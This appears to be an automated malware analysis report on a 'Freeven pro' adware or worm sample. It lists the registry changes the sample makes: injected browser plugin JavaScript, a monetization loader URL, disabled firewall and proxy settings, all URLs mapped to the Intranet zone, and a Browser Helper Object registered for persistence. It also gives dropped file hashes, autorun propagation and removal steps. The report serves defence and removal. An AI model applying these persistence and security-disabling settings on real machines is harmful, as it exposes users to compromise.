"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]e5"
[HKCU\Software\Freeven pro\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el5"
[HKCU\Software\Freeven pro\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\Freeven pro\Plugins\191]
"Name" = "ciuvo_m"
[HKCU\Software\Freeven pro\Plugins\91]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/monetizationLoader.js"
[HKCU\Software\Freeven pro\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\Freeven pro\Installer]
"StatsDomain" = "http://stats.clientstaticserv.com"
[HKCU\Software\Freeven pro\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,5"0>10?0>0?0:>
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process NOTEPAD.EXE:2288 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 31 93 D5 0E 96 D6 4A F1 F0 59 6B D8 9E A5 62"
The process NOTEPAD.EXE:2120 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 17 A7 EB 6D 16 BC 68 1A 3A 34 B0 62 B4 1E 5F"
The process NOTEPAD.EXE:2332 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E D1 8D AA A7 4A DB 98 1F 7C D0 E1 13 63 28 B6"
The process NOTEPAD.EXE:556 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 8A 59 84 A6 7A 52 F4 61 0A 56 7A 5B 7E C0 C0"
The process NOTEPAD.EXE:836 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 BF F8 F9 20 37 7D 7A 80 1D 6D 67 E8 2A AD E0"
The process NOTEPAD.EXE:2228 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F2 14 E4 5F 46 56 47 16 B0 E3 13 BF F3 D6 42"
The process NOTEPAD.EXE:3472 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 35 E2 84 00 53 F0 39 14 4E 83 A6 A1 17 01 A7"
The process NOTEPAD.EXE:2524 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 29 67 E8 C9 7D 71 78 30 E0 4A 0E 37 6F F0 90"
The process NOTEPAD.EXE:2604 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 FD 26 87 02 32 DC 78 54 FD 99 DC 73 35 18 F8"
The process NOTEPAD.EXE:3804 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE C9 E6 7D 47 7C C1 F2 37 F1 B9 02 A1 00 3E 08"
The process NOTEPAD.EXE:2896 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 8D 34 72 1C FE 6E 6D D4 F5 A3 50 37 75 75 BF"
The process NOTEPAD.EXE:3944 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 D2 3F FB EA 01 46 3F B7 94 13 65 F3 2A AD 94"
The process NOTEPAD.EXE:1136 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 93 1D 2B D2 5B AF A3 16 17 40 0D F9 0A 45 F3"
The process NOTEPAD.EXE:3852 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B C2 99 CD 18 66 62 51 DA A7 52 EC FB F7 5C B8"
The process NOTEPAD.EXE:2152 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 D8 EF FF 02 7E 40 81 B9 36 99 B1 78 6C B5 97"
The process NOTEPAD.EXE:296 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 99 72 A9 DE 8F 96 EA 17 D5 F8 DA 41 3A BD 4C"
The process NOTEPAD.EXE:2516 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 80 2A 25 1D 89 12 B4 95 21 E2 F4 13 A7 B7 9E"
The process NOTEPAD.EXE:2188 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 A6 EB 90 92 69 20 9A 63 82 96 98 03 87 A3 5C"
The process NOTEPAD.EXE:3896 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 17 97 35 F2 01 44 B5 6A 94 B2 56 DD 20 8B 74"
The process netsh.exe:2816 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 28 6D 50 FD BC 55 2E 61 8D 49 30 73 9F 58 A2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
The process netsh.exe:872 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 07 3D F5 4F F0 60 56 5E 9A B5 D7 76 77 D3 8A"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
The process notepad.exe:2056 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 16 1D CB 6D 88 66 84 4E AB A5 84 D2 22 19 21"
The process regsvr32.exe:2376 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\ProgID]
"(Default)" = "CrossriderApp0054248.BHO.1"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
"Version" = "1.0"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\CrossriderApp0054248.BHO]
"(Default)" = "CrossriderApp0054248"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CrossriderApp0054248.BHO\CurVer]
"(Default)" = "CrossriderApp0054248"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
[HKCR\CrossriderApp0054248.Sandbox.1]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\0\win32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0054248.BHO.1]
"(Default)" = "CrossriderApp0054248"
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}]
"(Default)" = "ISandBox"
[HKCR\CrossriderApp0054248.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422248}"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\ProgID]
"(Default)" = "CrossriderApp0054248.Sandbox.1"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\CrossriderApp0054248.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422248}"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054248"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 7C B2 F8 08 FC 24 B5 46 43 86 E1 A9 44 DD 68"
[HKCR\CrossriderApp0054248.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421148}"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}]
"(Default)" = "Freeven pro"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"
[HKCR\CrossriderApp0054248.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421148}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Freeven pro"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0]
"(Default)" = "CrossriderApp0054248 Type Library"
[HKCR\CrossriderApp0054248.Sandbox\CurVer]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}]
"(Default)" = "ICrossriderBHO"
[HKCR\CrossriderApp0054248.Sandbox]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\FLAGS]
"(Default)" = "0"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421148}]
"NoExplorer" = "1"
"(Default)" = "CrossriderApp0054248"
The Worm deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\ProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421148}]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\VersionIndependentProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\VersionIndependentProgID]
The process Freeven pro-bg.exe:2444 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 9C 3D 98 A6 80 B8 26 7B 83 71 FD 8F 9F 9E 01"
Dropped PE files
| MD5 | File path |
|---|---|
| 2392e63270923f75c15acc12e0bca68d | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe |
| 7acbb2626b7c3eb09c3a789fa4c643ef | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe |
| 8c926c9bddc514d51721810549931684 | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe |
| d800d4c37b42e60fa009f56dc8c1e55a | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe |
| 20d685dac506106f6488f014475a4d4c | c:\Program Files\Freeven pro\Freeven pro-bg.exe |
| 6feda0e61a6843511db89969f8485ed9 | c:\Program Files\Freeven pro\Freeven pro-bho.dll |
| c0dc0684d8021439d22d7a553545d02b | c:\Program Files\Freeven pro\Freeven pro-codedownloader.exe |
| 54cb1914f155ee7cb6309400ca3e81e5 | c:\Program Files\Freeven pro\Uninstall.exe |
| 323acc3f1ae4165d152a3673c07d6d95 | c:\Program Files\Freeven pro\utils.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560
Qvalysaly.exe:2176
%original file name%.exe:1860
875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180
875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508
WINMINE.EXE:1048
WINMINE.EXE:3776
WINMINE.EXE:544
Freeven pro-codedownloader.exe:2144
Freeven pro-codedownloader.exe:720
NOTEPAD.EXE:2288
NOTEPAD.EXE:2120
NOTEPAD.EXE:2332
NOTEPAD.EXE:556
NOTEPAD.EXE:836
NOTEPAD.EXE:2228
NOTEPAD.EXE:3472
NOTEPAD.EXE:2524
NOTEPAD.EXE:2604
NOTEPAD.EXE:3804
NOTEPAD.EXE:2896
NOTEPAD.EXE:3944
NOTEPAD.EXE:1136
NOTEPAD.EXE:3852
NOTEPAD.EXE:2152
NOTEPAD.EXE:296
NOTEPAD.EXE:2516
NOTEPAD.EXE:2188
NOTEPAD.EXE:3896
netsh.exe:2816
netsh.exe:872
notepad.exe:2056
regsvr32.exe:2376
Freeven pro-bg.exe:2444 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (5 bytes)
%Program Files%\Freeven pro\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-4.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (784 bytes)
%Program Files%\Freeven pro\Freeven pro-bg.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (5 bytes)
